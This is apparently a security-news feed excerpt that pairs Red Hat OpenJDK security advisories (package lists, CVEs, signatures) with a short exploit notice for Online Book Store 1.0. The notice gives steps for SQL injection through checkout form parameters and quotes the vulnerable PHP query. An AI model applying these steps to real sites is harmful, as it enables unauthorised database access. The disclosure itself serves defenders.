java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsfdzjgjWX9erEAQgq0Q//QX+4dXnHCWmG39cdVLR4dUj1TQcuGybm  
RXUuVFu/hqIQpE1jNPArLCeS19RWywZ8KI45rYLaGmhyR/mA6AJKMaJA3xCLtY+e  
aZXWmkcpmadVsLECb87sT5wNTEmWRnSPXoDWqv9zhDSTVOjr1Weg3wEPOBLnxEXu  
uTXm+ajW4zKeQC8vVKPkJV79vgb+0ltPRVASHgfjKTTkW7aDCN/u1+vkDhhnwI9s  
SklpX3Z3UDhjxu0VjHdhHBul/G5RnrHc0UVCjtuaKwPgQdgi9ueEgE5YDO+A+OWO  
xyVQlKtx+IHLt1rNy+kt4JVfbH3mR49VlPLdprF1jXtujWrx4X8O6G43zyKeerPt  
CaCiBHRzFPyuJJFRUfpZOWbEjY3jz93SekuWlwytPL2zn7GguEbtDtpW37KPyTO/  
GEhg6OXV9CkG+hYcN4vIbu4aOUNPKIz5EnTHKMj8KIGSq0rwvYrRo27ftFPkFC+D  
i7R3eBZjW1Av1c/7wFddWS+/+Oz17o47JBVCnOShINpUZB+kTPRvWLCyxkMzKghG  
a+T56VjqHYDc9JMSNyjqdV5CIWJQWxlkFkOo2xFlYL+k4p5bU3thYgrM9QYuCcCa  
A9s+FRyoRkR7WPBKmoY/AXTJHcSKmfE0EG63cusRdh4l1i7URfMNRtb4OgdpQLRa  
ucOmMTybnpk=  
=pXrM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1891-01

Red Hat Security Advisory 2023-1900-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1900-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1900  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186805)

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186812)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186808)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186805 - Add missing attributes when registering services in FIPS mode [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2186808 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2186812 - Enable XML Signature provider in FIPS mode [rhel-9, openjdk-17] [rhel-9.0.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
java-17-openjdk-17.0.7.0.7-1.el9_0.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el9_0.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsZtzjgjWX9erEAQjIog//ebXxDiQwT38w8Q9LZ/SpPJAkiRtem4YN  
akzFrJxBC/yYHauhryMnzbbxBcXgoVxoIoG8Wb6klzH2ZVrUQ+UVE8eQHiVTULuY  
BTbt05SHXDIHKONHr9+007UzM9+ajrOQxpM643ufOrYAXFbb3l5Q+wWgXq76bywr  
LsFGetcdxCaVj4TWNIH9kBPzQ1uoujQLzHZmRHTfQARm2T7vbJQW7VlwKCZKPlhT  
sasMQkXGFIXNoU9io0M0t7UXUZW3/tN+Ygu3DH4H+HxBswwX2/MLIDkAhnG9ApX4  
oEe6JG3zZvXhYfYlxFxdceoGmid237Pli9kBeH2oWBTpsB3Xdx7ZKO+fbnd7nmoC  
Py6uViGGxzgwnkyzkz/YyWUJEZ+Cwbck/aMdxolIQOoGkxqvjFFOc+32fyoiAee/  
vMdN8CNLknxeemb+CLcPRstmu80KVf85/xQcE9NWo01nVajWu4PNMYLlSN/NgE9Z  
8PnR9auHv12EIk2VBGaYq3lvQQHfQx4ROprFMvIITBdzb+cwqzU0EtYMU+S1cZ2U  
z6NUVWOUxFTcM6k2PUM62npQZbPMjg5Z725y0/ZlbwmMjVrH1bDrUPlVHLWAbV99  
5bmP6hdChs9soubSxc8ymexQToyvt920wXM5GVyZkhh35xZ5HtNyLt8FxswMPyI1  
A+4SEiM+K/E=  
=eGfu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1900-01

Online Book Store version 1.0 suffers from a remote SQL injection vulnerability. This is a variant of the original vulnerability discovered in August of 2020 by Moaaz Taha.

    # Exploit Title: Online Book Store 1.0 - (process.php) SQL injection# Google Dork: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip# Version: 1.0* STEPS *1- go to any book and add it to cart2- after that u will redirected to /cart.php3- click on Go To Checkout /checkout.php4- inject your'e injecton code in any of this post parametersparameters : name  address city zip_code country  foreach($_SESSION['cart'] as $isbn => $qty){    $bookprice = getbookprice($isbn);    $query = "INSERT INTO order_items VALUES <====== 1    ('$orderid', '$isbn', '$bookprice', '$qty')"; <====== 2    $result = mysqli_query($conn, $query); <====== 3    if(!$result){      echo "Insert value false!" . mysqli_error($conn2); <====== 4      exit;    }  }

Online Book Store 1.0 SQL Injection

Red Hat Security Advisory 2023-1909-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1909-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1909  
Issue date:        2023-04-25  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

